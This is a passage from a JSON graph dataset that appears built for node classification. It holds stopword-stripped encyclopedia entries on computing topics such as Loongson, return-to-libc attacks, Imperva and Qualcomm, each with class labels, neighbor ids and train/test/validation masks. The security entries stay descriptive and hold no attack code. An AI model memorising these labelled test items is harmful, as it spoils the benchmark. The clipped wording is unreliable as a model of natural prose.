computex'2006 yellowsheepriver announced municator ysr-639 small form factor computer based 400 mhz loongson 2 currently loongson boxes come 667 mhz godson 2e processor 800 mhz godson 2f processor sold china cny 1599 us 200 cny 1800 respectively without monitor mouse keyboard two manufacturers announced loongson 2f products sale outside china loongson insiders revealed new model based loongson 3a quad-core laptop developed expected launch august 2011 similar design macbook pro apple inc. carry linux operating system default september 2011 lemote announced yeeloong-8133 13.3 laptop featuring 900 mhz quad-core loongson-3a/2gq cpu 26 december 2007 china revealed first loongson based supercomputer performance 1 tflops peak performance 350 gflops measured linpack hefei designated kd-50-i supercomputer designed joint team led chen guoliang computer science technology department university science technology china ict secondary contractor kd-50-i first chinese built supercomputer utilize domestic chinese cpus total 336 loongson-2f cpus nodes interconnected ethernet size computer roughly equivalent household refrigerator cost less rmb800,000 approximately 120,000 80,000 20 april 2010 ustc announced successful development loongson 3a based kd-60-1 new supercomputer cluster standard blade servers total 80 quad-core loongson processors providing theoretical peak performance 1 tflops reduces power consumption 56 compared kd-50-i system similar performance 26 december 2012 ustc announced successful development loongson 3b based kd-90-1 new supercomputer cluster standard blade servers total 10 octo-core loongson processors providing theoretical peak performance 1 tflops reduces power consumption 62 compared kd-60 system similar performance high-performance dawning 6000 projected speed one quadrillion operations per second incorporate loongson processor core dawning 6000 currently jointly developed institute computing technology chinese academy sciences dawning information industry company li guojie chairman dawning information industry company director academician institute computing technology said research development dawning 6000 expected completed two years topstar also released pair mini-atx based motherboards teb-6040m teb-5040 development first loongson chip started 2001 25 june 2008 hu weiwu chief designer loongson processors gave keynote speech isca 2008 held beijing topic speech research development godson processors 2010 january jiangsu province plans buy 1.5 million loongson pcs",
    "neighbors": [
      3457,
      4098,
      7938,
      8327,
      8711,
      11405,
      398,
      783,
      6926,
      11282,
      7699,
      7445,
      410,
      4124,
      10780,
      6815,
      8481,
      1915,
      5028,
      6057,
      426,
      938,
      3883,
      4269,
      8237,
      7983,
      9132,
      5681,
      10675,
      1461,
      1463,
      823,
      3511,
      10303,
      321,
      4673,
      7234,
      709,
      6981,
      3911,
      1480,
      10316,
      2638,
      10715,
      1761,
      2788,
      485,
      6247,
      4841,
      6250,
      6252,
      6253,
      8044,
      10606,
      1776,
      4465,
      6256,
      10732,
      10734,
      3573,
      5237,
      10860,
      760,
      6009,
      3451,
      8445
    ],
    "mask": "Test"
  },
  {
    "node_id": 9852,
    "label": 6,
    "text": "Disc_spanning:disc spanning disc spanning feature cd dvd burning software automatically spreads large amount data across many data discs data set size exceeds storage capacity individual blank disc advantage user need split files directories two blank disc sized pieces hand software may may support slicing single large file order span disc spanners divide numerous files smaller one blank disc capacity across many discs disc spanning works well cd media many applications spanning dvd media fails often lack reliable dvd data disc spanning odd disc spanning used extensively older 3.5 5.25 floppy discs users assume every operating system perform disc spanning media built function incorrect disc spanning schemes include small program reassemble data set structure source machine program could written first disc every disc set use disc spanning cases make files unreadable file-system therefore bounded use program later restore data many users n't want bound solutions use simple disc spanning instead simple disc spanning solution groups files media grouped based size one drawback system files bigger target media burnt drive simple powerful simple calculation would many cd/dvd/bd/hd dvds bunch files need simple grouping displayed like disc1 -- 99 4,479mib br directory br -- dir1 br -- file1 br br disc2 -- 98 4,468mib br directory br -- dir2 br -- file2 br br disc3 -- 45 2,130mib br -- dir3 br etc ... br",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 9853,
    "label": 3,
    "text": "Boulder_Dash:boulder dash boulder dash video game released 1984 first star software atari 8-bit computers numerous versions sequels series numerous interactive platforms including apple ii msx zx spectrum commodore 64 colecovision nes bbc micro acorn electron ibm pc amstrad cpc amiga mac os platforms also influenced games rocks-and-diamonds genre repton addition rather direct clones emerald mine original boulder dash created canadian developers peter liepa chris gray october 28 1983 acquired first star software owns rights game intellectual property including registered trademark boulder dash game protagonist called rockford must dig caves collecting gems diamonds reach exit within time limit avoiding various types dangerous creatures well obstacles like falling rocks constant danger crushed trapped avalanche killed underground explosion january 1 2018 first star software name website owned bbg entertainment gmbh also purchased intellectual property rights pertaining games including boulder dash ii computing said bright colorful animation coupled breezy story line make game momentary diversion compute favorably reviewed boulder dash construction kit noting sample game much difficult original boulder dash mean machines gave game boy port boulder dash score 90 praising one finest video games ever written describing game one buy soon possible noting faithfulness original commodore 64 version publication reviewed nes version favourably stating extremely impressive title one greatest games ever written given 92 rating zx spectrum version placed ninth sinclair top 100 speccy games time ever journalist stuart campbell ign reviewed virtual console release commodore 64 version although graphics sound found dated enjoyed game stating still feels fresh 1984 concluded stating though n't look like much boulder dash rocks",
    "neighbors": [
      4705,
      9219,
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 9854,
    "label": 4,
    "text": "Return-to-libc_attack:return-to-libc attack return-to-libc attack computer security attack usually starting buffer overflow subroutine return address call stack replaced address subroutine already present process ’ executable memory bypassing no-execute bit feature present ridding attacker need inject code first example attack wild contributed alexander peslyak bugtraq mailing list 1997 posix-compliant operating systems c standard library codice_1 commonly used provide standard runtime environment programs written c programming language although attacker could make code return anywhere codice_1 likely target almost always linked program provides useful calls attacker codice_3 function used execute shell commands non-executable stack prevent buffer overflow exploitation however prevent return-to-libc attack return-to-libc attack existing executable code used hand attacks call preexisting functions stack-smashing protection prevent obstruct exploitation may detect corruption stack possibly flush compromised segment ascii armoring technique used obstruct kind attack ascii armoring system libraries e.g libc addresses contain null byte 0x00 commonly done placing first 0x01010101 bytes memory pages 16 mb dubbed ascii armor region every address including value contains least one null byte makes impossible emplace code containing addresses using string manipulation functions codice_4 however technique work attacker way overflow null bytes stack program large fit first 16 mib protection may incomplete technique similar another attack known return-to-plt instead returning libc attacker uses procedure linkage table plt functions loaded binary e.g codice_5 etc. address space layout randomization aslr makes type attack extremely unlikely succeed 64-bit machines memory locations functions random 32-bit systems aslr provides little benefit since 16 bits available randomization defeated brute force matter minutes",
    "neighbors": [
      7556,
      1820,
      7983,
      5040,
      5176,
      1474,
      4423,
      5065,
      1103,
      1106,
      3283,
      4562,
      8787,
      9432,
      7135,
      6754,
      3323,
      3708,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 9855,
    "label": 4,
    "text": "Imperva:imperva imperva cyber security software services company provides protection enterprise data application software company headquartered redwood shores california imperva originally named webcohort founded 2002 shlomo kramer amichai shulman mickey boodaei following year company shipped first product securesphere web application database protection web application firewall 2004 company changed name imperva 2011 imperva went public listed new york stock exchange nyse impv 2014 company acquired remaining shares incapsula cloud security gateway startup named skyfence real-time mainframe security auditing agents tomium software 2016 imperva published free scanner designed detect devices infected vulnerable mirai botnet february 2017 imperva sold skyfence forcepoint 40 million february 2017 imperva purchased camouflage data masking company august 2017 imperva named chris hylen former ceo citrix getgo new president ceo imperva former ceo anthony bettencourt resigned chairman board directors february 2018 august 2018 imperva acquired prevoty runtime application self-protection rasp security company also 2018 imperva identified bug popular web browser google chrome allowing attackers steal information via html tags audio video files 2019 imperva acquired private equity firm thoma bravo",
    "neighbors": [
      6916,
      2118,
      3112,
      2409,
      331,
      5371,
      8176,
      4883,
      10772,
      2134,
      3867,
      8668,
      2558,
      3807
    ],
    "mask": "Train"
  },
  {
    "node_id": 9856,
    "label": 4,
    "text": "James_Hall_III:james hall iii james w. hall iii born 1958 former united states army warrant officer signals intelligence analyst germany sold eavesdropping code secrets east germany soviet union 1983 1988 hall convicted espionage july 20 1989 fined 50,000 given dishonorable discharge serving 40-year sentence activities united states disciplinary barracks fort leavenworth kansas released september 2011 hall assigned nsa field station berlin teufelsberg one premier listening posts cold war 1982 1985 spied east germany soviet union 1983 1988 hall betrayed hundreds military secrets includes project trojan worldwide electronic network ability pinpoint armored vehicles missiles aircraft recording signal emissions wartime complete national sigint requirements list nsrl 4258-page document nsa activities government requirements sigint capabilities country hall sometimes spent two hours workday reproducing classified documents provide soviets east germans concerned putting regular duty time consistently worked late complete regular assignments used shopping bags smuggle originals documents photocopied frankfurt flat help east berlin associate using illegal income hall paid cash brand new volvo new truck also made large payment home took flying lessons said given military colleagues least six conflicting stories explain lavish life style 1986 hall stationed fort monmouth new jersey returning germany passed promotion sergeant first class year hall also applying appointment warrant officer part routine background investigation associated warrant appointment one supervisors major hall time staff sergeant commented investigator found strange hall could drive car volvo major could n't afford major went explain asked hall apparent disparity hall responded wealthy aunt died left large trust received 30,000 annually major found story plausible reiterated investigators visit investigators thanked major information told already knew trust hall co-workers fully taken duplicity unusual activities never drew much attention returning germany us traveled vienna austria meet soviet handler co-workers wondered would re-enlist become warrant officer several times conveying dissatisfaction army life course warrant officer rank allowed greater access classified material 1977–1981 tour detachment schneeberg intelligence gathering outpost vii corps 326th asa army security agency company west german-czechoslovakian border cold war hall generally good working relationship peers considered peers average analyst would sometimes erupt become upset trivial day-to-day problems however part considered sociable colleague also quickly picked working knowledge german language james also met future wife worked local restaurant bischofsgruen popular tourist town majority detachment soldiers lived hall eventually arrested december 21 1988 savannah georgia bragging undercover fbi agent period six years sold top secret intelligence data east germany soviet union time hall believed speaking soviet contact conversation claimed motivated money told fbi agent posing soviet intelligence officer n't terribly short money decided n't ever want worry next dollar coming 'm anti-american wave flag much anybody else case hall apparently began based tip manfred severin code-named canna clay stasi instructor acted translator courier james hall rejected german staatschutz cia army foreign counterintelligence fca eventually sponsored big tip james hall james hall apprehended severin exfiltrated west family arrest hall said many indicators visible around involved questionable activity hall activities inflicted grave damage u.s. signals intelligence considered perpetrator one costly damaging breaches security long cold war hall confessed giving handlers information us military liaison mission usmlm tank photography new year eve 1984 march 24 1985 inspection tour soviet military facilities ludwigslust german democratic republic us army major arthur d. nicholson jr. unarmed member usmlm shot death soviet sentry jailhouse interview first ever author kristie macrakis designated treasonous bastard cold war spy fbi also arrested hüseyin yıldırım turk served conduit hall east german intelligence officers hall received 100,000 payments reunification germany july 24 1992 almost documents hall copied handed stasi 13,088 pages total given back nsa federal commissioner stasi records joachim gauck later president germany ordered federal ministry interior us government pressure without consulting informing german parliamentary intelligence oversight committee prerequisite giving files away required law hundred pages retained kept top secret gauck well director agency hansjörg geiger later claimed remember ordered return documents agents place us government military worked mole either kgb russian foreign intelligence service svr include",
    "neighbors": [
      11544,
      5183
    ],
    "mask": "Test"
  },
  {
    "node_id": 9857,
    "label": 3,
    "text": "Mongoose-V:mongoose-v mongoose-v 32-bit microprocessor spacecraft onboard computer applications radiation-hardened expanded 10–15 mhz version mips r3000 cpu mongoose-v developed synova inc. melbourne florida usa support nasa goddard space flight center mongoose-v processor first flew nasa earth observing-1 eo-1 satellite launched november 2000 functioned main flight computer second mongoose-v controlled satellite solid-state data recorder mongoose-v requires 5 volts packaged 256-pin ceramic quad flatpack cqfp examples spacecraft use mongoose-v include",
    "neighbors": [
      7234,
      2503,
      7527,
      426,
      5642,
      6250,
      1776,
      8508,
      10974
    ],
    "mask": "None"
  },
  {
    "node_id": 9858,
    "label": 4,
    "text": "Jericho_Forum:jericho forum jericho forum international group working define promote de-perimeterisation initiated david lacey royal mail grew loose affiliation interested corporate cisos chief information security officers discussing topic summer 2003 initial meeting hosted cisco officially founded january 2004 declared success merged open group industry consortium security forum 2014 created founding members claimed one else appropriately discussing problems surrounding de-perimeterisation felt need create forum define solve consistently issues one earlier outputs group position paper entitled jericho forum commandments set principles describe best survive de-perimeterised world jericho forum consisted user members vendor members originally user members allowed stand election december 2008 relaxed allowing either vendor user members eligible election day-to-day management provided open group jericho forum foundations uk nearly initial members worked corporates global responsibilities involvement grew europe north america asia pacific initial focus defining problem de-perimeterisation forum moved onto focussing defining solution delivered publication collaboration oriented architecture coa paper coa framework paper next focus jericho forum securely collaborating clouds involves applying coa concepts emerging cloud computing paradigm basic premise collaborative approach essential gain value cloud final major piece jericho forum work 2009 around identity culminating 2011 publication identity entitlement access management commandments final months jericho forum contributed thinking debate around smart data handed security forum within open group continue jericho forum declared success sunsetted london conference opengroup 29 october 2013 video jericho forum work identity carried global identity foundation not-for-profit organisation working define components global digital identity ecosystem identity commandments directly translating principles behind identity 3.0",
    "neighbors": [
      9954,
      9513,
      8975,
      6834,
      9113
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9859,
    "label": 5,
    "text": "Zcoin:zcoin zcoin cryptocurrency aimed using cryptography provide better privacy users compared cryptocurrencies bitcoin late 2014 poramin insom student masters security informatics johns hopkins university wrote paper implementing zerocoin protocol cryptocurrency matthew green faculty member project create standalone cryptocurrency implementing zerocoin protocol named moneta 28 september 2016 zcoin xzc first cryptocurrency implement zerocoin protocol launched poramin insom team roger ver tim lee zcoin initial investors poramin also set exchanged named satang convert thai baht zcoin directly 20 february 2017 malicious coding attack zerocoin protocol created 370,000 fake tokens perpetrators sold 400 bitcoins 440,000 zcoin team announced single-symbol error piece code allowed attacker create zerocoin spend transactions without corresponding mint unlike ethereum dao event developers opted destroy coins attempt reverse happened newly generated ones april 2018 cryptographic flaw found zerocoin protocol allowed attackers steal destroy create zcoins zcoin cryptocurrency team acknowledging flaw stated high difficulty performing attacks low probability giving economic benefit attacker september 2018 zcoin introduced dandelion protocol hides origin ip address sender without using onion router tor virtual private network vpn october 2018 unknown user uploaded banned video zcoin blockchain order avoid thai government censorship november 2018 zcoin conducted world first large-scale party elections thailand democrat party using interplanetary file system ipfs december 2018 zcoin implemented merkle tree proof mining algorithm deters usage application-specific integrated circuit asic mining coins memory intensive miners allows ordinary users use central processing unit cpu graphics card mining enable egalitarianism coin mining month zcoin released academic paper proposing lelantus protocol remove need trusted setup hides origin amount coins transaction 30 july 2019 zcoin formally departed zerocoin protocol adopting new protocol called sigma prevents counterfeit privacy coins inflating coin supply achieved removing feature called trusted setup zerocoin protocol",
    "neighbors": [
      9248,
      3713,
      8706,
      3462,
      8262,
      8554,
      1776,
      1908,
      8916,
      11612,
      4280,
      1435,
      764,
      2045,
      4827,
      1087
    ],
    "mask": "None"
  },
  {
    "node_id": 9860,
    "label": 5,
    "text": "Simple_Sensor_Interface_protocol:simple sensor interface protocol simple sensor interface ssi protocol simple communications protocol designed data transfer computers user terminals smart sensors ssi protocol application layer protocol osi model ssi protocol developed jointly nokia vaisala suunto ionific mermit university oulu currently ssi developed within mimosa project part european union framework programmes research technological development ssi protocol used point-to-point communications uart networking nanoip applications ssi also provides polling sensors streaming sensor data rfid sensor tags ssi specifies memory map sensor data criteria ssi protocol development sample implementation ssi protocol msp430 microcontrollers published open source august 2006 nokia ssi message consists 2-byte header n -byte payload header consists one byte address wildcard 0x3f ascii one byte message/command type different possible values message/command type presented ssi v1.2 command base group commands used find configure sensor units utilizing ssi-protocol group commands used read sensor data infrequently data streaming purposes defined commands point-to-point messaging ssi done ssi/uart ssi uart message consists 3-byte uart header ssi message payload optional cyclic redundancy check checksum use checksum defined ssi message/command type lower case commands indicating use crc header consists start byte 0xfe 2-byte total length message 2-byte bitwise negation length help identify frame start ssi networking variable environment done using nanoip typical case using ssi individual message important nanoudp simplified udp defined nanoip used message format individual messages important nanotcp used provides flow control retransmission cost message size increase network traffic nanoudp message consists 5-byte nanoudp header n -byte message payload optional 2-byte crc checksum header consists one protocol byte 2-byte message length total length including header crc 1-byte source port 1-byte destination port number destination port number 0x28 ssi messages",
    "neighbors": [
      6403,
      9987,
      1030,
      3847,
      9992,
      6544,
      1297,
      3218,
      8211,
      11413,
      5270,
      6681,
      5402,
      5021,
      3742,
      2206,
      5405,
      10271,
      10274,
      1955,
      9381,
      10924,
      562,
      2996,
      9909,
      7478,
      7865,
      4797,
      3006,
      4543,
      3133,
      5437,
      5439,
      7360,
      7364,
      11332,
      2887,
      8265,
      2509,
      4691,
      5469,
      5470,
      5472,
      1893,
      10344,
      11112,
      8432,
      5875,
      5118,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 9861,
    "label": 3,
    "text": "K1810VM86:k1810vm86 k1810vm86 soviet 16-bit microprocessor clone intel 8086 cpu binary pin compatible developed 1982 1985 original k1810vm86 supported clock frequency 5 mhz 8 mhz allowed later k1810vm86m к1810вм86m corresponding intel 8086-2 k1810vm86 manufactured plastic 40-pin dual in-line package kr1810vm86 кр1810вм86 40-pin ceramic dual in-line package km1810vm86 км1810вм86 commercial version m1810vm86 м1810вм86 military version clone related intel 8088 8-bit bus manufactured k1810vm88 also plastic ceramic packages k1810vm86 manufactured n-mos process family consists following chips brevity table lists chip variants plastic dip prefix кр listed separately variants ceramic dip prefix км commercial version prefix м military version additionally many devices k580 series could used k1810 series well unlike earlier kr580vm80a popular soviet union little used elsewhere k1810vm86 widely used throughout eastern bloc due one first 16-bit microprocessors available among one x86 instruction set allowing run ms-dos examples personal computers built based k1810vm86 8-bit bus variant k1810vm88 cmos versions equivalent intel 80c86 named kr1834vm86 кр1834вм86 developed kiev 1989 1990 manufactured minsk kr1835vm86 кр1835вм86 original kr1810vm86 still shown price list 2 february 2018 kvazar plant kiev together various support chips k580 k1810 series newer cmos versions appear longer production clone intel 80c286 manufactured name kr1847vm286 кр1847вм286 apparently see widespread use processors x86 instruction set designed soviet union much later 1875vd1t 1875вд1т equivalent intel 80c186 1875vd2t 1875вд2т equivalent intel 80386extb",
    "neighbors": [
      11169,
      1058,
      6659,
      5348,
      2503,
      6957,
      9166,
      1776,
      1425,
      7538,
      499,
      6453,
      6806,
      2874
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9862,
    "label": 4,
    "text": "Marc_Maiffret:marc maiffret marc maiffret chief technology officer beyondtrust security compliance management company maiffret joined beyondtrust way acquisition eeye digital security co-founded 1998 along firas bushnaq maiffret created one first vulnerability management web application firewall products date deployed worldwide numerous product awards maiffret credited discovering first major vulnerability discoveries microsoft software leads beyondtrust ’ advanced research labs responsible identifying new trends enterprise security benefit beyondtrust product roadmap maiffret left eeye three-year period served chief security architect fireeye returned eeye july 2010 brief time away eeye maiffret also founded invenio security eventually merged veteran consulting firm digitrust group digitrust maiffret managed company professional services division including network security consulting managed security services maiffret also responsible helping expand firm ’ internal research development efforts maiffret known running eeye top security research team nearly 10 years present well discovering critical microsoft security vulnerabilities code red maiffret accepted three invitations testify united states congress matters national cybersecurity critical security threats posed public private infrastructures named one people magazine magazine ’ 30 people 30 featured cover stories details los angeles times entrepreneur magazine usa today addition numerous television appearances maiffret featured mtv ’ true life 'm hacker october 1999 marc guest speaker episode 91 security leo laporte steve gibson influential industry marc spoken variety conferences including issa los angeles infosec 2011 featured several publications including cnn fox news security week sc magazine pc world computer world marc 'chameleon hacking group 'rhino9 marc also known 'sn1per hacking group no|d august 22 2013 yahoo news reported maiffret prompting hackers support raising 10,000 reward khalil shreateh august 20 maiffret stated already raised 9,000 efforts including 2,000 contributed hackers alike denounced facebook actions maiffret said sitting palestine research five-year-old laptop looks like half broken something might help big way",
    "neighbors": [
      11051,
      3852,
      11320,
      5563,
      4956
    ],
    "mask": "Test"
  },
  {
    "node_id": 9863,
    "label": 3,
    "text": "Qualcomm:qualcomm qualcomm incorporated american multinational semiconductor telecommunications equipment company designs markets wireless telecommunications products services derives revenue chipmaking bulk profit patent licensing businesses company headquarter located san diego california united states 224 worldwide locations parent company qualcomm incorporated qualcomm number wholly owned subsidiaries qualcomm cdma technologies qct sells qualcomm ’ products services including chipsets qualcomm technology licensing qtl responsible patent licensing business qualcomm technologies inc. qti operates nearly qualcomm r activities qualcomm created july 1 1985 seven former linkabit employees led dr. irwin jacobs company named qualcomm “ quality communications. ” started contract research development center largely government defense projects qualcomm merged omninet 1988 raised 3.5 million funding order produce omnitracs satellite communications system trucking companies qualcomm grew eight employees 1986 620 employees 1991 due demand omnitracs 1989 qualcomm 32 million revenues 50 percent omnitracs contract schneider national omnitracs profits helped fund qualcomm research development code-division multiple access cdma technologies cell phone networks qualcomm operating loss 1990s due investment cdma research obtain funding company filed initial public offering september 1991 raising 68 million additional 486 million raised 1995 sale 11.5 million shares second funding round done raise money mass manufacturing cdma-based phones base-stations equipment us-based cellular networks announced would adopt cdma standard company 383 million annual revenue 1995 814 million 1996 1991 qualcomm acquired eudora email client software pc could used omnitracs system acquisition associated widely used email client company little-known time 1998 qualcomm restructured leading 700-employee layoff cell-phone manufacturing business also spun-off order focus higher-margin patents business following year qualcomm fastest growing stock market 2,621 percent growth one year 2000 qualcomm grown 6,300 employees 3.2 billion revenues 670 million profit 39 percent sales cdma technology followed licensing 22 wireless 22 products 17 around time qualcomm established offices europe asia pacific latin america 2001 65 percent qualcomm revenues originated outside united states 35 percent coming south korea 2005 paul e. jacobs son qualcomm founder dr. irwin jacobs appointed qualcomm new ceo whereas irwin jacobs focused cdma patents paul jacobs refocused much qualcomm new research development projects related internet things qualcomm announced steven mollenkopf would succeed paul jacobs ceo december 2013 mollenkopf said would expand qualcomm focus wireless technology cars wearable devices new markets european commission fined qualcomm €997 million abuse dominant market position january 24 2018 march 16 2018 qualcomm removed executive chairman paul jacobs broached long-shot bid buyout earlier week 2018 qualcomm filed lawsuit intel several meet-and-confers exchanges written correspondence may 18 intel appeared willing cooperate offering 'limited supplemental production technical materials relating relevant components designed 2018 iphone models exchange qualcomm agreement limited production would satisfy certain requests document subpoena us federal court filing states court us march 15 2019 ruled apple must indemnify qualcomm infringing three patents related mobile technologies jury ruled apple pay 31 million chip maker 1.41 per iphone used company ’ technology without authorization fiscal year 2018 qualcomm reported loss us 4.86 billion annual revenue us 22.7 billion increase 2 previous fiscal cycle qualcomm shares traded 51 75 per share market capitalization end fiscal 2018 valued us 105 billion company ranked 133rd fortune 500 list largest united states corporations revenue qualcomm pioneered commercialization cdmaone is-95 standard wireless cellular communications following cdma2000 early standard third-generation 3g mobile today company leading patent holder advanced 3g mobile technologies including cdma2000 1xev-do evolutions wcdma higher-speed variant known hspa evolutions td-scdma well patents 4g license streams patents inventions related products major component qualcomm business june 2011 qualcomm announced would release set application programming interfaces geared give web-based applications deeper links hardware beginning 1991 qualcomm participated development globalstar satellite system along loral space communications uses low earth orbit leo satellite constellation consisting 44 active satellites system used voice telephony via hand-held satellite phones asset tracking data transfer using mobile satellite modems system designed normal is-95 system used satellite bent pipe repeater transfer cellular signals handset terrestrial base station unlike iridium system routes phone calls satellites globalstar satellite must always able see handset base station establish connection therefore coverage earth poles satellite orbits also coverage locations large globalstar base stations view locations south atlantic example globalstar hardware manufactured qualcomm like satellite phone networks globalstar went bankrupt 1999 bought group investors currently running system january 2017 apple announced 1 billion lawsuit qualcomm overcharging chips failing pay 1 billion rebates qualcomm however rejected accusations calling claims baseless week apple lawsuit qualcomm shares dropped federal trade commission accused company demanding excessive royalties technologies essential industry standards qualcomm sued group shareholders wake aforementioned ftc ruling apple lawsuit january 4 2019 ftc trial began judge lucy koh united states district court northern district california january 24 2018 european commission announced €997 million fine 1.2 billion 4.9 2017 turnover qualcomm violating antitrust laws means deals apple january 14 2019 apple coo jeff williams said apple wanted use qualcomm modems iphone xs xr qualcomm refused sell apple sued licensing practices leading apple using intel modems instead april 16 2019 opening arguments begun suit two companies settled apple pay unspecified amount enter six-year patent licensing agreement multi-year agreement qualcomm provide hardware company intel concurrently announced would longer develop 5g modems mobile devices later announced july 2019 would sell majority smartphone modem business apple 1 billion april 2006 dispute reliance communications qualcomm royalty fees cost qualcomm approximately 11.7b market capitalization july 2007 reliance qualcomm decided settle matter agreed expand use cdma technology india june 2007 u.s. international trade commission blocked import new cell phone models based particular qualcomm microchips found qualcomm microchips infringe patents owned broadcom broadcom also initiated patent litigation u.s. courts issue issue software designed extend battery life chips users make out-of-network calls october itc administrative judge made initial ruling qualcomm violated broadcom patent covering feature commission later affirmed decision sprint nextel corp. using software patch qualcomm get around u.s. government agency ban new phones qualcomm chips august 2007 judge rudi brewster held qualcomm engaged litigation misconduct withholding relevant documents lawsuit brought broadcom qualcomm employees lied involvement july 2009 south korea antitrust watchdog fined qualcomm record won260bn 207m unfair business practices related chipset sales sparking strong protests company fair trade commission accused qualcomm abusing dominant position korean market cdma mobile phone chips charging higher royalties handset makers bought modem chips competitors offering rebates customers bought products mainly us group regulator said statement 2009 qualcomm broadcom entered settlement multi-year patent agreement ending litigation companies 2012 federal probe launched company ’ compliance foreign corrupt practices act bars companies well individuals bribing foreign officials gain business 2014 china anti-monopoly regulator announced qualcomm suspected overcharging abusing market position february 2015 china moved fine qualcomm record 975 million tactics government claimed hurt consumers july 16 2015 european commission announced opened two antitrust investigations qualcomm behavior field baseband chipsets consumer devices july 2016 group women filed class-action gender discrimination lawsuit qualcomm alleging firm discriminated women science technology engineering mathematics areas class 3,400 employees suit settled august 2017 firm agreed pay 19.5 million plaintiff law firm said company also institute significant changes policies practices help eliminate gender disparities foster equal employment opportunity going forward march 2017 south korea found qualcomm prevented samsung selling chips phone makers current umts air interfaces part based qualcomm patents royalties patents represent significant part qualcomm revenue followed series patent-related lawsuits antitrust complaints spearheaded broadcom us 2006 broadcom started series patent-related lawsuits antitrust complaints qualcomm get broadcom regarded fair terms access w-cdma technologies broadcom soon joined nokia others complaints also filed european commission 2007 european commission launched inquiry qualcomm possible abusing dominant position market third-generation phones complaints first lodged 2005 leading handset manufacturers ericsson nokia nec panasonic texas instruments october 2008 nokia announced make one-time payment 2.29 billion us qualcomm part patent agreement company chinese tdscdma 3g technology developed primarily avoid qualcomm licensing fees although qualcomm claims chinese technology still infringes many qualcomm patents qchat push-to-talk ptt technology qchat software application developed qualcomm internet services qis division qualcomm part qualcomm wireless internet group qis offers set software products content enablement services support accelerate growth wireless data market qualcomm developed qchat provide reliable method instant connection two-way communication users different locations operating within type network architecture prior existence cellular personal communications services networks type communication limited private land mobile radio system lmr technology used public safety utility service agencies lmr limitations specifically usage restricted geographic coverage area use disparate frequency bands qchat application developed brew platform ptt communication technology 3g networks qchat handsets server software allow users connect instantaneously qchat users anywhere world push button addition qchat enables one-to-one private one-to-many group calls 3g networks qchat uses standard voice internet protocol voip technologies voip voice delivery mechanism uses internet protocol manage delivery voice information voice information sent digital form ip-based data networks including cdma discrete packets rather traditional circuit-switched protocols used public switched telephone network pstn qchat users 3g wireless devices connect worldwide either private group calls push button qchat uses voice internet protocol voip technologies allow subscribers communicate using ptt button handset instead making standard cellular call qchat calls created combining separate point-to-point connections ip endpoint process managed qchat applications server deployed carrier ip-based wide area network wan initiate call user presses ptt button receives immediate indication whether call recipient available caller begin speaking immediately recipient unavailable caller simply hear negative response tone instead busy signal voicemail october 16 2006 sprint nextel announced agreement qualcomm use qchat provide high performance push-to-talk services customers nationwide sprint pcs network using cdma2000 1xev-do revision technology qchat able inter-operate iden push-to-talk handsets nextel national network sprint phones supporting qchat technology released starting april 2008 trial business customers kansas colorado sprint announced nextel direct connect devices powered qchat available 40 markets june 2008 ending production new qchat devices november 2009 supported models included august 2016 computer security company check point found several serious security problems qualcomm chips bug called quadrooter ability let hackers read information android phones even worse hackers full access affected user installs app exploits one vulnerabilities according check point affects 900 million android users affected phones include recent android phones check point published scan tool android users blackberry developing repair tool qualcomm released fixes four issues three included android updates top google phones time publication bug",
    "neighbors": [
      10248,
      8714,
      1038,
      1550,
      11282,
      9244,
      7199,
      5664,
      7200,
      6178,
      9255,
      3117,
      8237,
      1083,
      10813,
      10303,
      5185,
      3140,
      2117,
      11333,
      9828,
      1638,
      6268,
      638,
      6783,
      11391,
      644,
      6276,
      10884,
      1674,
      7820,
      11405,
      5262,
      146,
      659,
      11418,
      8865,
      4259,
      8355,
      1705,
      9391,
      7857,
      6834,
      9913,
      7354,
      196,
      2258,
      8919,
      8921,
      10971,
      2273,
      2788,
      6884,
      1766,
      1772,
      9964,
      9970,
      6391,
      5371,
      3323,
      2308,
      7432,
      11528,
      4890,
      9498,
      5918,
      7456,
      10537,
      810,
      3883,
      2862,
      5938,
      7988,
      8003,
      10051,
      9541,
      11591,
      5963,
      1871,
      1872,
      9042,
      11094,
      6495,
      1377,
      9569,
      10086,
      6001,
      1400,
      8568,
      11646,
      392,
      9610,
      7566,
      4505,
      2458,
      3483,
      4508,
      5020,
      7068,
      10658,
      2979,
      5028,
      424,
      4011,
      9137,
      5563,
      9665,
      9163,
      7631,
      980,
      4569,
      8668,
      8160,
      10725,
      6125,
      10223,
      1014,
      3575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9864,
    "label": 9,
    "text": "Space-cadet_keyboard:space-cadet keyboard space-cadet keyboard keyboard designed john l. kulp used lisp machines massachusetts institute technology mit inspired several still-current jargon terms field computer science influenced design emacs inspired knight keyboard developed knight tv system used mit incompatible timesharing system symbolics-labeled version shown used lm-2 symbolics repackaged version mit cadr later symbolics systems used greatly simplified keyboard symbolics keyboard retained basic layout commonly used function modifier keys space-cadet keyboard space-cadet keyboard equipped seven modifier keys four keys bucky bits three shift keys called labeled top introduced earlier knight keyboard introduced keyboard group row thus allowing easy pressing several modifier keys via chording example could pressed fingers one hand pressing another key hand many keys three symbols accessible via shift keys letter symbol top greek letter front example key l two-way arrow ↔ top greek letter lambda λ front pressing key right hand playing appropriate chord left hand shift keys user could get following results might addition typed combination keys keyboard possible type 8,000 different characters allowed user type complicated mathematical text also thousands single-character commands disposal many users willing memorise command meanings many characters reduced typing time attitude shaped interface emacs compare use key vi due convenient position key adm-3a terminal users however thought many bucky bits overkill objected design grounds keyboard require three four hands operate result emacs making frequent use multiple modifiers easy space-cadet keyboard substantially harder use modern keyboards whose layout generally follows model ibm pc keyboard modifier keys grouped together thus harder press together also reason emacs uses m- prefix describing key presses m- stood space-cadet keyboard emacs ported pcs key used place keyboard included key limited application support also included four roman numeral keys allowed easy interaction lists four fewer choices",
    "neighbors": [
      10104,
      8993,
      1147,
      10253
    ],
    "mask": "Test"
  },
  {
    "node_id": 9865,
    "label": 9,
